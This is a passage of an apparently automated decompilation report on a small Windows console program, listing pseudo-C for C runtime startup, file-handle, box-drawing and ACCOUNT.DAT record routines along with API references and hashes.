                                                                      								__eflags = _t6;
                                                                      								_t38 = 0 | _t6;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					L2:
                                                                      					_t38 = 0;
                                                                      				}
                                                                      				 *(_t51 - 0x1c) = _t38;
                                                                      				if(E00BED058() == 0) {
                                                                      					E00BE89F5(0x1c);
                                                                      				}
                                                                      				if(E00BED6D2(_t38, _t47) == 0) {
                                                                      					_t19 = E00BE89F5(0x10);
                                                                      				}
                                                                      				E00BEBE1F(_t19);
                                                                      				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                                      				E00BEA5C3();
                                                                      				 *0xc04080 = GetCommandLineA();
                                                                      				 *0xc02284 = E00BEFCE2();
                                                                      				_t24 = E00BEF8ED();
                                                                      				_t56 = _t24;
                                                                      				if(_t24 < 0) {
                                                                      					E00BE751F(_t38, _t46, _t47, _t49, _t56, 8);
                                                                      				}
                                                                      				_t25 = E00BEFB1A(_t38, _t46, _t47, _t49);
                                                                      				_t57 = _t25;
                                                                      				if(_t25 < 0) {
                                                                      					E00BE751F(_t38, _t46, _t47, _t49, _t57, 9);
                                                                      				}
                                                                      				_t26 = E00BE7559(_t47, _t49, 1);
                                                                      				_pop(_t40);
                                                                      				_t58 = _t26;
                                                                      				if(_t26 != 0) {
                                                                      					E00BE751F(_t38, _t46, _t47, _t49, _t58, _t26);
                                                                      					_pop(_t40);
                                                                      				}
                                                                      				_t50 = E00BE1040(_t40, _t47, _t49, _t58, _t60, 0xbe0000, 0, E00BEFD6D(), _t49);
                                                                      				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
                                                                      				if(_t38 == 0) {
                                                                      					E00BE77B1(_t50);
                                                                      				}
                                                                      				E00BE754A();
                                                                      				 *(_t51 - 4) = 0xfffffffe;
                                                                      				return E00BE91A5(_t50);
                                                                      			}














                                                                      0x00be88a7
                                                                      0x00be88a7
                                                                      0x00be88a7
                                                                      0x00be88a7
                                                                      0x00be88b1
                                                                      0x00be88b3
                                                                      0x00be88b8
                                                                      0x00be88c2
                                                                      0x00be88c7
                                                                      0x00be88d2
                                                                      0x00be88d9
                                                                      0x00be88df
                                                                      0x00be88e4
                                                                      0x00be88ee
                                                                      0x00000000
                                                                      0x00be88f0
                                                                      0x00be88f5
                                                                      0x00be88fc
                                                                      0x00000000
                                                                      0x00be88fe
                                                                      0x00be88fe
                                                                      0x00be8900
                                                                      0x00be8907
                                                                      0x00be8909
                                                                      0x00be890f
                                                                      0x00be890f
                                                                      0x00be890f
                                                                      0x00be890f
                                                                      0x00be8907
                                                                      0x00be88fc
                                                                      0x00be88db
                                                                      0x00be88db
                                                                      0x00be88db
                                                                      0x00be88db
                                                                      0x00be8912
                                                                      0x00be891c
                                                                      0x00be8920
                                                                      0x00be8925
                                                                      0x00be892d
                                                                      0x00be8931
                                                                      0x00be8936
                                                                      0x00be8937
                                                                      0x00be893c
                                                                      0x00be8940
                                                                      0x00be894b
                                                                      0x00be8955
                                                                      0x00be895a
                                                                      0x00be895f
                                                                      0x00be8961
                                                                      0x00be8965
                                                                      0x00be896a
                                                                      0x00be896b
                                                                      0x00be8970
                                                                      0x00be8972
                                                                      0x00be8976
                                                                      0x00be897b
                                                                      0x00be897e
                                                                      0x00be8983
                                                                      0x00be8984
                                                                      0x00be8986
                                                                      0x00be8989
                                                                      0x00be898e
                                                                      0x00be898e
                                                                      0x00be89a2
                                                                      0x00be89a4
                                                                      0x00be89a9
                                                                      0x00be89ac
                                                                      0x00be89ac
                                                                      0x00be89b1
                                                                      0x00be89e6
                                                                      0x00be89f4

                                                                      APIs
                                                                      • ___security_init_cookie.LIBCMT ref: 00BE88A7
                                                                        • Part of subcall function 00BEC013: GetStartupInfoW.KERNEL32(?), ref: 00BEC01D
                                                                      • _fast_error_exit.LIBCMT ref: 00BE8920
                                                                      • _fast_error_exit.LIBCMT ref: 00BE8931
                                                                      • __RTC_Initialize.LIBCMT ref: 00BE8937
                                                                      • __ioinit0.LIBCMT ref: 00BE8940
                                                                      • GetCommandLineA.KERNEL32(00BFD838,00000014), ref: 00BE8945
                                                                      • ___crtGetEnvironmentStringsA.LIBCMT ref: 00BE8950
                                                                      • __setargv.LIBCMT ref: 00BE895A
                                                                      • __setenvp.LIBCMT ref: 00BE896B
                                                                      • __cinit.LIBCMT ref: 00BE897E
                                                                      • __wincmdln.LIBCMT ref: 00BE898F
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                                      • String ID:
                                                                      • API String ID: 1504447550-0
                                                                      • Opcode ID: 4ff3011b31dc53a600e388d210b8201e508794c930cd43f8e599d334ea0918a6
                                                                      • Instruction ID: 55dbaa0b73c66652ddc56418dce5393444aeea717b85f24049c6428a092f46dc
                                                                      • Opcode Fuzzy Hash: 4ff3011b31dc53a600e388d210b8201e508794c930cd43f8e599d334ea0918a6
                                                                      • Instruction Fuzzy Hash: EC21D634E44BC699DB207BF39856B3D21D4EF10711F2054E9FA09AB0D3DFB489809263
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00BE8E23(void* __eflags, signed int _a4) {
                                                                      				void* _t12;
                                                                      				signed int _t13;
                                                                      				signed int _t16;
                                                                      				intOrPtr _t18;
                                                                      				void* _t22;
                                                                      				signed int _t35;
                                                                      				long _t40;
                                                                      
                                                                      				_t13 = E00BEA5A7(_t12);
                                                                      				if(_t13 >= 0) {
                                                                      					_t35 = _a4;
                                                                      					if(E00BF0132(_t35) == 0xffffffff) {
                                                                      						L10:
                                                                      						_t40 = 0;
                                                                      					} else {
                                                                      						_t18 =  *0xc02f60; // 0x0
                                                                      						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                                      							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                                      								goto L8;
                                                                      							} else {
                                                                      								goto L7;
                                                                      							}
                                                                      						} else {
                                                                      							L7:
                                                                      							_t22 = E00BF0132(2);
                                                                      							if(E00BF0132(1) == _t22) {
                                                                      								goto L10;
                                                                      							} else {
                                                                      								L8:
                                                                      								if(CloseHandle(E00BF0132(_t35)) != 0) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									_t40 = GetLastError();
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					E00BF00AC(_t35);
                                                                      					 *((char*)( *((intOrPtr*)(0xc02f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                                      					if(_t40 == 0) {
                                                                      						_t16 = 0;
                                                                      					} else {
                                                                      						_t16 = E00BE8EDE(_t40) | 0xffffffff;
                                                                      					}
                                                                      					return _t16;
                                                                      				} else {
                                                                      					return _t13 | 0xffffffff;
                                                                      				}
                                                                      			}










                                                                      0x00be8e26
                                                                      0x00be8e2d
                                                                      0x00be8e36
                                                                      0x00be8e43
                                                                      0x00be8e95
                                                                      0x00be8e95
                                                                      0x00be8e45
                                                                      0x00be8e45
                                                                      0x00be8e4d
                                                                      0x00be8e5b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be8e63
                                                                      0x00be8e63
                                                                      0x00be8e65
                                                                      0x00be8e77
                                                                      0x00000000
                                                                      0x00be8e79
                                                                      0x00be8e79
                                                                      0x00be8e89
                                                                      0x00000000
                                                                      0x00be8e8b
                                                                      0x00be8e91
                                                                      0x00be8e91
                                                                      0x00be8e89
                                                                      0x00be8e77
                                                                      0x00be8e4d
                                                                      0x00be8e98
                                                                      0x00be8eb0
                                                                      0x00be8eb7
                                                                      0x00be8ec5
                                                                      0x00be8eb9
                                                                      0x00be8ec0
                                                                      0x00be8ec0
                                                                      0x00be8eca
                                                                      0x00be8e2f
                                                                      0x00be8e33
                                                                      0x00be8e33

                                                                      APIs
                                                                      • __ioinit.LIBCMT ref: 00BE8E26
                                                                        • Part of subcall function 00BEA5A7: InitOnceExecuteOnce.KERNEL32(00C0229C,00BEA5E2,00000000,00000000,00BF1205,?,?,00BE9886,00000000,?,?,?,00BE71AD,-00000020,00BFD7B8,0000000C), ref: 00BEA5B5
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E3A
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E65
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E6E
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E7A
                                                                      • CloseHandle.KERNEL32(00000000,00BE2656,00000000,?,00BF41AB,00BE2656,?,?,?,?,?,?,?,00BE2656,00000000,00000109), ref: 00BE8E81
                                                                      • GetLastError.KERNEL32(?,00BF41AB,00BE2656,?,?,?,?,?,?,?,00BE2656,00000000,00000109), ref: 00BE8E8B
                                                                      • __free_osfhnd.LIBCMT ref: 00BE8E98
                                                                      • __dosmaperr.LIBCMT ref: 00BE8EBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                                      • String ID:
                                                                      • API String ID: 974577687-0
                                                                      • Opcode ID: 7b7fe33199f5356c6d46e233265c01de3e0f48e708b17e2c6903a32ccc292704
                                                                      • Instruction ID: b722d1dfb01ea64a9c2b2a08afe0825bfdcc038b7a933b880c2ef912f65f9c4f
                                                                      • Opcode Fuzzy Hash: 7b7fe33199f5356c6d46e233265c01de3e0f48e708b17e2c6903a32ccc292704
                                                                      • Instruction Fuzzy Hash: 8B112532601AE419C220337AA84973E77CA9F41774F2502C9FA1CDB1E2EF6498458290
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE3B48
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _fprintf.LIBCMT ref: 00BE3DA6
                                                                      Strings
                                                                      • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00BE3D9A
                                                                      • TEMP.DAT, xrefs: 00BE3AE2
                                                                      • ACCOUNT.DAT, xrefs: 00BE3ABE
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE3B3D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __fsopen_fprintf_swscanf_vfscanf
                                                                      • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                                                      • API String ID: 1563022539-2055742014
                                                                      • Opcode ID: c828d23baf53e87c5c06df59f8e44d34ef8d3fc1fd4e47b17bbc542223cbc110
                                                                      • Instruction ID: f187d1b4cd012d05092426f1e91849781d3544c014d6e632d6f8cf6489a54e0c
                                                                      • Opcode Fuzzy Hash: c828d23baf53e87c5c06df59f8e44d34ef8d3fc1fd4e47b17bbc542223cbc110
                                                                      • Instruction Fuzzy Hash: DB910572C105599ECB09CFB8D995BEEFBB9EF45300F1482AEE106BA181EB345685CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E00BE1380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr _t67;
                                                                      				void* _t75;
                                                                      				intOrPtr _t87;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      				void* _t105;
                                                                      				void* _t106;
                                                                      
                                                                      				_t102 = __esi;
                                                                      				_t101 = __edi;
                                                                      				E00BE12B0(_a4, _a8);
                                                                      				_push(0xc9);
                                                                      				_push("%c");
                                                                      				E00BE715C(_t75, __edi, __esi, __eflags);
                                                                      				_t104 = _t103 + 8;
                                                                      				_v8 = _a4 + 1;
                                                                      				while(1) {
                                                                      					_t109 = _v8 - _a12 - 1;
                                                                      					if(_v8 >= _a12 - 1) {
                                                                      						break;
                                                                      					}
                                                                      					E00BE12B0(_v8, _a8);
                                                                      					_push(0xcd);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t75, _t101, _t102, _t109);
                                                                      					_t104 = _t104 + 8;
                                                                      					_v8 = _v8 + 1;
                                                                      				}
                                                                      				E00BE12B0(_v8, _a8);
                                                                      				_push(0xbb);
                                                                      				_push("%c");
                                                                      				E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      				_t105 = _t104 + 8;
                                                                      				_v12 = _a8 + 1;
                                                                      				while(1) {
                                                                      					__eflags = _v12 - _a16;
                                                                      					if(__eflags >= 0) {
                                                                      						break;
                                                                      					}
                                                                      					E00BE12B0(_a4, _v12);
                                                                      					_v8 = _a4;
                                                                      					while(1) {
                                                                      						__eflags = _v8 - _a12;
                                                                      						if(_v8 >= _a12) {
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _v8 - _a4;
                                                                      						if(__eflags == 0) {
                                                                      							L12:
                                                                      							E00BE12B0(_v8, _v12);
                                                                      							_push(0xba);
                                                                      							_push("%c");
                                                                      							E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      							_t105 = _t105 + 8;
                                                                      						} else {
                                                                      							__eflags = _v8 - _a12 - 1;
                                                                      							if(__eflags == 0) {
                                                                      								goto L12;
                                                                      							}
                                                                      						}
                                                                      						_t67 = _v8 + 1;
                                                                      						__eflags = _t67;
                                                                      						_v8 = _t67;
                                                                      					}
                                                                      					_t87 = _v12 + 1;
                                                                      					__eflags = _t87;
                                                                      					_v12 = _t87;
                                                                      				}
                                                                      				E00BE12B0(_a4, _v12);
                                                                      				_push(0xc8);
                                                                      				_push("%c");
                                                                      				E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      				_t106 = _t105 + 8;
                                                                      				_v8 = _a4 + 1;
                                                                      				while(1) {
                                                                      					__eflags = _v8 - _a12 - 1;
                                                                      					if(__eflags >= 0) {
                                                                      						break;
                                                                      					}
                                                                      					E00BE12B0(_v8, _v12);
                                                                      					_push(0xcd);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      					_t106 = _t106 + 8;
                                                                      					_t61 = _v8 + 1;
                                                                      					__eflags = _t61;
                                                                      					_v8 = _t61;
                                                                      				}
                                                                      				E00BE12B0(_v8, _v12);
                                                                      				_push(0xbc);
                                                                      				_push("%c");
                                                                      				return E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      			}














                                                                      0x00be1380
                                                                      0x00be1380
                                                                      0x00be138e
                                                                      0x00be1393
                                                                      0x00be1398
                                                                      0x00be139d
                                                                      0x00be13a2
                                                                      0x00be13ab
                                                                      0x00be13b9
                                                                      0x00be13bf
                                                                      0x00be13c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be13cc
                                                                      0x00be13d1
                                                                      0x00be13d6
                                                                      0x00be13db
                                                                      0x00be13e0
                                                                      0x00be13b6
                                                                      0x00be13b6
                                                                      0x00be13ed
                                                                      0x00be13f2
                                                                      0x00be13f7
                                                                      0x00be13fc
                                                                      0x00be1401
                                                                      0x00be140a
                                                                      0x00be1418
                                                                      0x00be141b
                                                                      0x00be141e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1428
                                                                      0x00be1430
                                                                      0x00be143e
                                                                      0x00be1441
                                                                      0x00be1444
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1449
                                                                      0x00be144c
                                                                      0x00be1459
                                                                      0x00be1461
                                                                      0x00be1466
                                                                      0x00be146b
                                                                      0x00be1470
                                                                      0x00be1475
                                                                      0x00be144e
                                                                      0x00be1454
                                                                      0x00be1457
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1457
                                                                      0x00be1438
                                                                      0x00be1438
                                                                      0x00be143b
                                                                      0x00be143b
                                                                      0x00be1412
                                                                      0x00be1412
                                                                      0x00be1415
                                                                      0x00be1415
                                                                      0x00be1484
                                                                      0x00be1489
                                                                      0x00be148e
                                                                      0x00be1493
                                                                      0x00be1498
                                                                      0x00be14a1
                                                                      0x00be14af
                                                                      0x00be14b5
                                                                      0x00be14b8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be14c2
                                                                      0x00be14c7
                                                                      0x00be14cc
                                                                      0x00be14d1
                                                                      0x00be14d6
                                                                      0x00be14a9
                                                                      0x00be14a9
                                                                      0x00be14ac
                                                                      0x00be14ac
                                                                      0x00be14e3
                                                                      0x00be14e8
                                                                      0x00be14ed
                                                                      0x00be14fd

                                                                      APIs
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE139D
                                                                      • _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE13FC
                                                                      • _wprintf.LIBCMT ref: 00BE1470
                                                                      • _wprintf.LIBCMT ref: 00BE1493
                                                                      • _wprintf.LIBCMT ref: 00BE14D1
                                                                      • _wprintf.LIBCMT ref: 00BE14F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                                      • String ID:
                                                                      • API String ID: 1778593935-0
                                                                      • Opcode ID: e22859e9d21d48492caa265b40bc43cc9c8926e211036c7efb74cf7bd0972b72
                                                                      • Instruction ID: a5d70ce5c2ec77793fad69c2a54478842e7e33fa121825fc27523347729162a6
                                                                      • Opcode Fuzzy Hash: e22859e9d21d48492caa265b40bc43cc9c8926e211036c7efb74cf7bd0972b72
                                                                      • Instruction Fuzzy Hash: 0D415E71A11249FBCB14EF99CD82EAE77F5AF45300F3086D8FA05AB381D730AA449B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00BED6D2(void* __ebx, void* __edi) {
                                                                      				void* __esi;
                                                                      				void* _t3;
                                                                      				intOrPtr _t6;
                                                                      				long _t14;
                                                                      				long* _t27;
                                                                      
                                                                      				E00BE75FE(_t3);
                                                                      				if(E00BEBF8E() != 0) {
                                                                      					_t6 = E00BEBFD8(_t5, E00BED468);
                                                                      					 *0xc01a40 = _t6;
                                                                      					__eflags = _t6 - 0xffffffff;
                                                                      					if(_t6 == 0xffffffff) {
                                                                      						goto L1;
                                                                      					} else {
                                                                      						_t27 = E00BEC55B(1, 0x3b8);
                                                                      						__eflags = _t27;
                                                                      						if(_t27 == 0) {
                                                                      							L6:
                                                                      							E00BED748();
                                                                      							__eflags = 0;
                                                                      							return 0;
                                                                      						} else {
                                                                      							__eflags = E00BEC002(_t9,  *0xc01a40, _t27);
                                                                      							if(__eflags == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_push(0);
                                                                      								_push(_t27);
                                                                      								E00BED626(__ebx, __edi, _t27, __eflags);
                                                                      								_t14 = GetCurrentThreadId();
                                                                      								_t27[1] = _t27[1] | 0xffffffff;
                                                                      								 *_t27 = _t14;
                                                                      								__eflags = 1;
                                                                      								return 1;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					L1:
                                                                      					E00BED748();
                                                                      					return 0;
                                                                      				}
                                                                      			}








                                                                      0x00bed6d2
                                                                      0x00bed6de
                                                                      0x00bed6ed
                                                                      0x00bed6f3
                                                                      0x00bed6f8
                                                                      0x00bed6fb
                                                                      0x00000000
                                                                      0x00bed6fd
                                                                      0x00bed70a
                                                                      0x00bed70e
                                                                      0x00bed710
                                                                      0x00bed73f
                                                                      0x00bed73f
                                                                      0x00bed744
                                                                      0x00bed747
                                                                      0x00bed712
                                                                      0x00bed720
                                                                      0x00bed722
                                                                      0x00000000
                                                                      0x00bed724
                                                                      0x00bed724
                                                                      0x00bed726
                                                                      0x00bed727
                                                                      0x00bed72e
                                                                      0x00bed734
                                                                      0x00bed738
                                                                      0x00bed73c
                                                                      0x00bed73e
                                                                      0x00bed73e
                                                                      0x00bed722
                                                                      0x00bed710
                                                                      0x00bed6e0
                                                                      0x00bed6e0
                                                                      0x00bed6e0
                                                                      0x00bed6e7
                                                                      0x00bed6e7

                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00BED6D2
                                                                        • Part of subcall function 00BE75FE: EncodePointer.KERNEL32(00000000,?,00BED6D7,00BE892B,00BFD838,00000014), ref: 00BE7601
                                                                        • Part of subcall function 00BE75FE: __initp_misc_winsig.LIBCMT ref: 00BE7622
                                                                      • __mtinitlocks.LIBCMT ref: 00BED6D7
                                                                        • Part of subcall function 00BEBF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(00C013D0,00000FA0,?,?,00BED6DC,00BE892B,00BFD838,00000014), ref: 00BEBFAC
                                                                      • __mtterm.LIBCMT ref: 00BED6E0
                                                                      • __calloc_crt.LIBCMT ref: 00BED705
                                                                      • __initptd.LIBCMT ref: 00BED727
                                                                      • GetCurrentThreadId.KERNEL32(00BE892B,00BFD838,00000014), ref: 00BED72E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                      • String ID:
                                                                      • API String ID: 2211675822-0
                                                                      • Opcode ID: d102cf6a58f41e56d965c498cfb5fc2c2131df7bcde18397ec0d30ff1012719b
                                                                      • Instruction ID: fda291febfd88f68ca6b82b9080efc254e86c93bbd7ce1ce57d16e912b5f182c
                                                                      • Opcode Fuzzy Hash: d102cf6a58f41e56d965c498cfb5fc2c2131df7bcde18397ec0d30ff1012719b
                                                                      • Instruction Fuzzy Hash: 13F0F03220A3D12AE7243B3B7C0375A36D4CB403B0B200699F825CA0D1EFB088418194
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E00BEBB6C(void* __eflags, signed char _a4, signed int* _a8) {
                                                                      				signed int _v8;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t45;
                                                                      				signed int _t48;
                                                                      				signed int _t52;
                                                                      				void* _t60;
                                                                      				signed int _t62;
                                                                      				void* _t64;
                                                                      				signed int _t67;
                                                                      				signed int _t70;
                                                                      				signed int _t74;
                                                                      				signed int _t76;
                                                                      				void* _t77;
                                                                      				signed int _t85;
                                                                      				void* _t86;
                                                                      				signed int _t87;
                                                                      				signed int _t89;
                                                                      				signed int* _t92;
                                                                      
                                                                      				_t44 = E00BEA5A7(_t43);
                                                                      				if(_t44 >= 0) {
                                                                      					_t92 = _a8;
                                                                      					_t45 = E00BE8BB2(_t92);
                                                                      					_t74 = _t92[3];
                                                                      					_t89 = _t45;
                                                                      					__eflags = _t74 & 0x00000082;
                                                                      					if(__eflags != 0) {
                                                                      						__eflags = _t74 & 0x00000040;
                                                                      						if(__eflags == 0) {
                                                                      							_t70 = 0;
                                                                      							__eflags = _t74 & 0x00000001;
                                                                      							if((_t74 & 0x00000001) == 0) {
                                                                      								L10:
                                                                      								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                                                                      								_t92[3] = _t48;
                                                                      								_t92[1] = _t70;
                                                                      								__eflags = _t48 & 0x0000010c;
                                                                      								if((_t48 & 0x0000010c) == 0) {
                                                                      									_t60 = E00BE8C70();
                                                                      									__eflags = _t92 - _t60 + 0x20;
                                                                      									if(_t92 == _t60 + 0x20) {
                                                                      										L13:
                                                                      										_t62 = E00BF11E7(_t89);
                                                                      										__eflags = _t62;
                                                                      										if(_t62 == 0) {
                                                                      											goto L14;
                                                                      										}
                                                                      									} else {
                                                                      										_t64 = E00BE8C70();
                                                                      										__eflags = _t92 - _t64 + 0x40;
                                                                      										if(_t92 != _t64 + 0x40) {
                                                                      											L14:
                                                                      											E00BF192E(_t92);
                                                                      										} else {
                                                                      											goto L13;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__eflags = _t92[3] & 0x00000108;
                                                                      								if((_t92[3] & 0x00000108) == 0) {
                                                                      									__eflags = 1;
                                                                      									_push(1);
                                                                      									_v8 = 1;
                                                                      									_push( &_a4);
                                                                      									_push(_t89);
                                                                      									_t45 = E00BF0343(_t70, _t86, _t89, _t92, 1);
                                                                      									_t70 = _t45;
                                                                      									goto L27;
                                                                      								} else {
                                                                      									_t87 = _t92[2];
                                                                      									_t25 = _t87 + 1; // 0x1a06
                                                                      									 *_t92 = _t25;
                                                                      									_t76 =  *_t92 - _t87;
                                                                      									_v8 = _t76;
                                                                      									_t92[1] = _t92[6] - 1;
                                                                      									__eflags = _t76;
                                                                      									if(__eflags <= 0) {
                                                                      										__eflags = _t89 - 0xffffffff;
                                                                      										if(_t89 == 0xffffffff) {
                                                                      											L22:
                                                                      											_t77 = 0xc01390;
                                                                      										} else {
                                                                      											__eflags = _t89 - 0xfffffffe;
                                                                      											if(_t89 == 0xfffffffe) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0xc02f60 + (_t89 >> 5) * 4));
                                                                      											}
                                                                      										}
                                                                      										__eflags =  *(_t77 + 4) & 0x00000020;
                                                                      										if(__eflags == 0) {
                                                                      											goto L25;
                                                                      										} else {
                                                                      											_push(2);
                                                                      											_push(_t70);
                                                                      											_push(_t70);
                                                                      											_push(_t89);
                                                                      											_t45 = E00BF17B4(_t70, _t89, _t92, __eflags) & _t87;
                                                                      											__eflags = _t45 - 0xffffffff;
                                                                      											if(_t45 == 0xffffffff) {
                                                                      												goto L28;
                                                                      											} else {
                                                                      												goto L25;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_push(_t76);
                                                                      										_push(_t87);
                                                                      										_push(_t89);
                                                                      										_t70 = E00BF0343(_t70, _t87, _t89, _t92, __eflags);
                                                                      										L25:
                                                                      										_t45 = _a4;
                                                                      										 *(_t92[2]) = _t45;
                                                                      										L27:
                                                                      										__eflags = _t70 - _v8;
                                                                      										if(_t70 == _v8) {
                                                                      											_t52 = _a4 & 0x000000ff;
                                                                      										} else {
                                                                      											L28:
                                                                      											_t40 =  &(_t92[3]);
                                                                      											 *_t40 = _t92[3] | 0x00000020;
                                                                      											__eflags =  *_t40;
                                                                      											goto L29;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								_t92[1] = 0;
                                                                      								__eflags = _t74 & 0x00000010;
                                                                      								if((_t74 & 0x00000010) == 0) {
